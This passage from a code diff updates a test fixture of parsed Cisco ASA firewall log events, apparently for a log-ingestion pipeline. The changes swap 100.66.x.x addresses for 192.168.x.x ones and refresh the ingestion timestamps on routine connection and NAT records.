outside:100.66.93.51/53 (100.66.93.51/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:34:28.099193300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11763 for outside:192.168.93.51/53 (192.168.93.51/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -2506,7 +2506,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.93.51", + "mapped_source_ip": "192.168.93.51", "connection_id": "11763", "source_interface": "outside", "mapped_destination_port": 56132 @@ -2528,8 +2528,8 @@ }, "source": { "port": 53, - "address": "100.66.238.126", - "ip": "100.66.238.126" + "address": "192.168.238.126", + "ip": "192.168.238.126" }, "tags": [ "preserve_original_event" @@ -2564,7 +2564,7 @@ "localhost" ], "ip": [ - "100.66.238.126", + "192.168.238.126", "172.31.98.44" ] }, @@ -2574,8 +2574,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-09-07T12:21:32.721363600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11762 for outside:100.66.238.126/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 111", + "ingested": "2021-12-09T13:34:28.099199Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11762 for outside:192.168.238.126/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 111", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -2612,8 +2612,8 @@ }, "source": { "port": 53, - "address": "100.66.93.51", - "ip": "100.66.93.51" + "address": "192.168.93.51", + "ip": "192.168.93.51" }, "tags": [ "preserve_original_event" @@ -2648,7 +2648,7 @@ "localhost" ], "ip": [ - "100.66.93.51", + "192.168.93.51", "172.31.98.44" ] }, @@ -2658,8 +2658,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-09-07T12:21:32.721368Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11763 for outside:100.66.93.51/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 237", + "ingested": "2021-12-09T13:34:28.099204700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11763 for outside:192.168.93.51/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 237", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -2691,8 +2691,8 @@ }, "destination": { "port": 8259, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1775, @@ -2732,7 +2732,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -2740,8 +2740,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721372300Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1775 to outside:100.66.98.44/8259", + "ingested": "2021-12-09T13:34:28.099210400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1775 to outside:192.168.98.44/8259", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -2774,8 +2774,8 @@ }, "source": { "port": 443, - "address": "100.66.225.103", - "ip": "100.66.225.103" + "address": "192.168.225.103", + "ip": "192.168.225.103" }, "tags": [ "preserve_original_event" @@ -2810,7 +2810,7 @@ "localhost" ], "ip": [ - "100.66.225.103", + "192.168.225.103", "172.31.98.44" ] }, @@ -2819,8 +2819,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721376500Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11764 for outside:100.66.225.103/443 (100.66.225.103/443) to inside:172.31.98.44/1775 (172.31.98.44/1775)", + "ingested": "2021-12-09T13:34:28.099216200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11764 for outside:192.168.225.103/443 (192.168.225.103/443) to inside:172.31.98.44/1775 (172.31.98.44/1775)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -2836,7 +2836,7 @@ "destination_interface": "inside", "mapped_source_port": 443, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.225.103", + "mapped_source_ip": "192.168.225.103", "connection_id": "11764", "source_interface": "outside", "mapped_destination_port": 1775 @@ -2853,8 +2853,8 @@ }, "destination": { "port": 1189, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 56132, @@ -2894,7 +2894,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -2902,8 +2902,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721380700Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:100.66.98.44/1189", + "ingested": "2021-12-09T13:34:28.099222100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:192.168.98.44/1189", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -2936,8 +2936,8 @@ }, "source": { "port": 53, - "address": "100.66.240.126", - "ip": "100.66.240.126" + "address": "192.168.240.126", + "ip": "192.168.240.126" }, "tags": [ "preserve_original_event" @@ -2972,7 +2972,7 @@ "localhost" ], "ip": [ - "100.66.240.126", + "192.168.240.126", "172.31.98.44" ] }, @@ -2981,8 +2981,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721384900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11772 for outside:100.66.240.126/53 (100.66.240.126/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:34:28.099227900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11772 for outside:192.168.240.126/53 (192.168.240.126/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -2998,7 +2998,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.240.126", + "mapped_source_ip": "192.168.240.126", "connection_id": "11772", "source_interface": "outside", "mapped_destination_port": 56132 @@ -3020,8 +3020,8 @@ }, "source": { "port": 53, - "address": "100.66.44.45", - "ip": "100.66.44.45" + "address": "192.168.44.45", + "ip": "192.168.44.45" }, "tags": [ "preserve_original_event" @@ -3056,7 +3056,7 @@ "localhost" ], "ip": [ - "100.66.44.45", + "192.168.44.45", "172.31.98.44" ] }, @@ -3065,8 +3065,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721389100Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11773 for outside:100.66.44.45/53 (100.66.44.45/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:34:28.099233600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11773 for outside:192.168.44.45/53 (192.168.44.45/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -3082,7 +3082,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.44.45", + "mapped_source_ip": "192.168.44.45", "connection_id": "11773", "source_interface": "outside", "mapped_destination_port": 56132 @@ -3104,8 +3104,8 @@ }, "source": { "port": 53, - "address": "100.66.240.126", - "ip": "100.66.240.126" + "address": "192.168.240.126", + "ip": "192.168.240.126" }, "tags": [ "preserve_original_event" @@ -3140,7 +3140,7 @@ "localhost" ], "ip": [ - "100.66.240.126", + "192.168.240.126", "172.31.98.44" ] }, @@ -3150,8 +3150,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-09-07T12:21:32.721393500Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11772 for outside:100.66.240.126/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 87", + "ingested": "2021-12-09T13:34:28.099239300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11772 for outside:192.168.240.126/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 87", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -3188,8 +3188,8 @@ }, "source": { "port": 53, - "address": "100.66.44.45", - "ip": "100.66.44.45" + "address": "192.168.44.45", + "ip": "192.168.44.45" }, "tags": [ "preserve_original_event" @@ -3224,7 +3224,7 @@ "localhost" ], "ip": [ - "100.66.44.45", + "192.168.44.45", "172.31.98.44" ] }, @@ -3234,8 +3234,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-09-07T12:21:32.721397700Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11773 for outside:100.66.44.45/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 221", + "ingested": "2021-12-09T13:34:28.099245Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11773 for outside:192.168.44.45/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 221", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -3267,8 +3267,8 @@ }, "destination": { "port": 8265, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1452, @@ -3308,7 +3308,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -3316,8 +3316,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721402200Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1452 to outside:100.66.98.44/8265", + "ingested": "2021-12-09T13:34:28.099249100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1452 to outside:192.168.98.44/8265", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -3350,8 +3350,8 @@ }, "source": { "port": 80, - "address": "100.66.179.219", - "ip": "100.66.179.219" + "address": "192.168.179.219", + "ip": "192.168.179.219" }, "tags": [ "preserve_original_event" @@ -3386,7 +3386,7 @@ "localhost" ], "ip": [ - "100.66.179.219", + "192.168.179.219", "172.31.98.44" ] }, @@ -3395,8 +3395,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721406500Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11774 for outside:100.66.179.219/80 (100.66.179.219/80) to inside:172.31.98.44/1452 (172.31.98.44/1452)", + "ingested": "2021-12-09T13:34:28.099253700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11774 for outside:192.168.179.219/80 (192.168.179.219/80) to inside:172.31.98.44/1452 (172.31.98.44/1452)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -3412,7 +3412,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.179.219", + "mapped_source_ip": "192.168.179.219", "connection_id": "11774", "source_interface": "outside", "mapped_destination_port": 1452 @@ -3434,8 +3434,8 @@ }, "source": { "port": 53, - "address": "100.66.157.232", - "ip": "100.66.157.232" + "address": "192.168.157.232", + "ip": "192.168.157.232" }, "tags": [ "preserve_original_event" @@ -3470,7 +3470,7 @@ "localhost" ], "ip": [ - "100.66.157.232", + "192.168.157.232", "172.31.98.44" ] }, @@ -3479,8 +3479,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721418100Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11775 for outside:100.66.157.232/53 (100.66.157.232/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:34:28.099259Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11775 for outside:192.168.157.232/53 (192.168.157.232/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -3496,7 +3496,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.157.232", + "mapped_source_ip": "192.168.157.232", "connection_id": "11775", "source_interface": "outside", "mapped_destination_port": 56132 @@ -3518,8 +3518,8 @@ }, "source": { "port": 53, - "address": "100.66.178.133", - "ip": "100.66.178.133" + "address": "192.168.178.133", + "ip": "192.168.178.133" }, "tags": [ "preserve_original_event" @@ -3554,7 +3554,7 @@ "localhost" ], "ip": [ - "100.66.178.133", + "192.168.178.133", "172.31.98.44" ] }, @@ -3563,8 +3563,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721422900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11776 for outside:100.66.178.133/53 (100.66.178.133/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:34:28.099263900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11776 for outside:192.168.178.133/53 (192.168.178.133/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -3580,7 +3580,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.178.133", + "mapped_source_ip": "192.168.178.133", "connection_id": "11776", "source_interface": "outside", "mapped_destination_port": 56132 @@ -3602,8 +3602,8 @@ }, "source": { "port": 53, - "address": "100.66.157.232", - "ip": "100.66.157.232" + "address": "192.168.157.232", + "ip": "192.168.157.232" }, "tags": [ "preserve_original_event" @@ -3638,7 +3638,7 @@ "localhost" ], "ip": [ - "100.66.157.232", + "192.168.157.232", "172.31.98.44" ] }, @@ -3648,8 +3648,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-09-07T12:21:32.721427800Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11775 for outside:100.66.157.232/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 101", + "ingested": "2021-12-09T13:34:28.099269800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11775 for outside:192.168.157.232/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 101", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -3686,8 +3686,8 @@ }, "source": { "port": 53, - "address": "100.66.178.133", - "ip": "100.66.178.133" + "address": "192.168.178.133", + "ip": "192.168.178.133" }, "tags": [ "preserve_original_event" @@ -3722,7 +3722,7 @@ "localhost" ], "ip": [ - "100.66.178.133", + "192.168.178.133", "172.31.98.44" ] }, @@ -3732,8 +3732,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-09-07T12:21:32.721436Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11776 for outside:100.66.178.133/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 126", + "ingested": "2021-12-09T13:34:28.099274100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11776 for outside:192.168.178.133/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 126", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -3765,8 +3765,8 @@ }, "destination": { "port": 8266, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1453, @@ -3806,7 +3806,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -3814,8 +3814,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721441100Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1453 to outside:100.66.98.44/8266", + "ingested": "2021-12-09T13:34:28.099278300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1453 to outside:192.168.98.44/8266", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -3848,8 +3848,8 @@ }, "source": { "port": 80, - "address": "100.66.133.112", - "ip": "100.66.133.112" + "address": "192.168.133.112", + "ip": "192.168.133.112" }, "tags": [ "preserve_original_event" @@ -3884,7 +3884,7 @@ "localhost" ], "ip": [ - "100.66.133.112", + "192.168.133.112", "172.31.98.44" ] }, @@ -3893,8 +3893,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721445600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11777 for outside:100.66.133.112/80 (100.66.133.112/80) to inside:172.31.98.44/1453 (172.31.98.44/1453)", + "ingested": "2021-12-09T13:34:28.099281900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11777 for outside:192.168.133.112/80 (192.168.133.112/80) to inside:172.31.98.44/1453 (172.31.98.44/1453)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -3910,7 +3910,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.133.112", + "mapped_source_ip": "192.168.133.112", "connection_id": "11777", "source_interface": "outside", "mapped_destination_port": 1453 @@ -3932,8 +3932,8 @@ }, "source": { "port": 80, - "address": "100.66.133.112", - "ip": "100.66.133.112" + "address": "192.168.133.112", + "ip": "192.168.133.112" }, "tags": [ "preserve_original_event" @@ -3968,7 +3968,7 @@ "localhost" ], "ip": [ - "100.66.133.112", + "192.168.133.112", "172.31.98.44" ] }, @@ -3979,8 +3979,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-09-07T12:21:32.721450400Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11777 for outside:100.66.133.112/80 to inside:172.31.98.44/1453 duration 0:00:00 bytes 862 TCP FINs", + "ingested": "2021-12-09T13:34:28.099286300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11777 for outside:192.168.133.112/80 to inside:172.31.98.44/1453 duration 0:00:00 bytes 862 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -4017,8 +4017,8 @@ }, "source": { "port": 53, - "address": "100.66.204.197", - "ip": "100.66.204.197" + "address": "192.168.204.197", + "ip": "192.168.204.197" }, "tags": [ "preserve_original_event" @@ -4053,7 +4053,7 @@ "localhost" ], "ip": [ - "100.66.204.197", + "192.168.204.197", "172.31.98.44" ] }, @@ -4062,8 +4062,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721454900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11779 for outside:100.66.204.197/53 (100.66.204.197/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:34:28.099292200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11779 for outside:192.168.204.197/53 (192.168.204.197/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -4079,7 +4079,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.204.197", + "mapped_source_ip": "192.168.204.197", "connection_id": "11779", "source_interface": "outside", "mapped_destination_port": 56132 @@ -4101,8 +4101,8 @@ }, "source": { "port": 53, - "address": "100.66.157.232", - "ip": "100.66.157.232" + "address": "192.168.157.232", + "ip": "192.168.157.232" }, "tags": [ "preserve_original_event" @@ -4137,7 +4137,7 @@ "localhost" ], "ip": [ - "100.66.157.232", + "192.168.157.232", "172.31.98.44" ] }, @@ -4147,8 +4147,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-09-07T12:21:32.721459200Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11778 for outside:100.66.157.232/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104", + "ingested": "2021-12-09T13:34:28.099297900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11778 for outside:192.168.157.232/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -4185,8 +4185,8 @@ }, "source": { "port": 53, - "address": "100.66.204.197", - "ip": "100.66.204.197" + "address": "192.168.204.197", + "ip": "192.168.204.197" }, "tags": [ "preserve_original_event" @@ -4221,7 +4221,7 @@ "localhost" ], "ip": [ - "100.66.204.197", + "192.168.204.197", "172.31.98.44" ] }, @@ -4231,8 +4231,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-09-07T12:21:32.721463500Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11779 for outside:100.66.204.197/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 176", + "ingested": "2021-12-09T13:34:28.099303900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11779 for outside:192.168.204.197/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 176", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -4264,8 +4264,8 @@ }, "destination": { "port": 8267, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1454, @@ -4305,7 +4305,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -4313,8 +4313,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721468Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1454 to outside:100.66.98.44/8267", + "ingested": "2021-12-09T13:34:28.099309800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1454 to outside:192.168.98.44/8267", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -4347,8 +4347,8 @@ }, "source": { "port": 80, - "address": "100.66.128.3", - "ip": "100.66.128.3" + "address": "192.168.128.3", + "ip": "192.168.128.3" }, "tags": [ "preserve_original_event" @@ -4383,7 +4383,7 @@ "localhost" ], "ip": [ - "100.66.128.3", + "192.168.128.3", "172.31.98.44" ] }, @@ -4392,8 +4392,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721472200Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11780 for outside:100.66.128.3/80 (100.66.128.3/80) to inside:172.31.98.44/1454 (172.31.98.44/1454)", + "ingested": "2021-12-09T13:34:28.099315500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11780 for outside:192.168.128.3/80 (192.168.128.3/80) to inside:172.31.98.44/1454 (172.31.98.44/1454)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -4409,7 +4409,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.128.3", + "mapped_source_ip": "192.168.128.3", "connection_id": "11780", "source_interface": "outside", "mapped_destination_port": 1454 @@ -4426,8 +4426,8 @@ }, "destination": { "port": 8268, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1455, @@ -4467,7 +4467,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -4475,8 +4475,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721476400Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1455 to outside:100.66.98.44/8268", + "ingested": "2021-12-09T13:34:28.099321300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1455 to outside:192.168.98.44/8268", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -4509,8 +4509,8 @@ }, "source": { "port": 80, - "address": "100.66.128.3", - "ip": "100.66.128.3" + "address": "192.168.128.3", + "ip": "192.168.128.3" }, "tags": [ "preserve_original_event" @@ -4545,7 +4545,7 @@ "localhost" ], "ip": [ - "100.66.128.3", + "192.168.128.3", "172.31.98.44" ] }, @@ -4554,8 +4554,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721480800Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11781 for outside:100.66.128.3/80 (100.66.128.3/80) to inside:172.31.98.44/1455 (172.31.98.44/1455)", + "ingested": "2021-12-09T13:34:28.099327100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11781 for outside:192.168.128.3/80 (192.168.128.3/80) to inside:172.31.98.44/1455 (172.31.98.44/1455)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -4571,7 +4571,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.128.3", + "mapped_source_ip": "192.168.128.3", "connection_id": "11781", "source_interface": "outside", "mapped_destination_port": 1455 @@ -4588,8 +4588,8 @@ }, "destination": { "port": 8269, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1456, @@ -4629,7 +4629,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -4637,8 +4637,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721485300Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1456 to outside:100.66.98.44/8269", + "ingested": "2021-12-09T13:34:28.099332800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1456 to outside:192.168.98.44/8269", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -4671,8 +4671,8 @@ }, "source": { "port": 80, - "address": "100.66.128.3", - "ip": "100.66.128.3" + "address": "192.168.128.3", + "ip": "192.168.128.3" }, "tags": [ "preserve_original_event" @@ -4707,7 +4707,7 @@ "localhost" ], "ip": [ - "100.66.128.3", + "192.168.128.3", "172.31.98.44" ] }, @@ -4716,8 +4716,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721489400Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11782 for outside:100.66.128.3/80 (100.66.128.3/80) to inside:172.31.98.44/1456 (172.31.98.44/1456)", + "ingested": "2021-12-09T13:34:28.099338600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11782 for outside:192.168.128.3/80 (192.168.128.3/80) to inside:172.31.98.44/1456 (172.31.98.44/1456)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -4733,7 +4733,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.128.3", + "mapped_source_ip": "192.168.128.3", "connection_id": "11782", "source_interface": "outside", "mapped_destination_port": 1456 @@ -4755,8 +4755,8 @@ }, "source": { "port": 53, - "address": "100.66.100.4", - "ip": "100.66.100.4" + "address": "192.168.100.4", + "ip": "192.168.100.4" }, "tags": [ "preserve_original_event" @@ -4791,7 +4791,7 @@ "localhost" ], "ip": [ - "100.66.100.4", + "192.168.100.4", "172.31.98.44" ] }, @@ -4800,8 +4800,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721493600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built 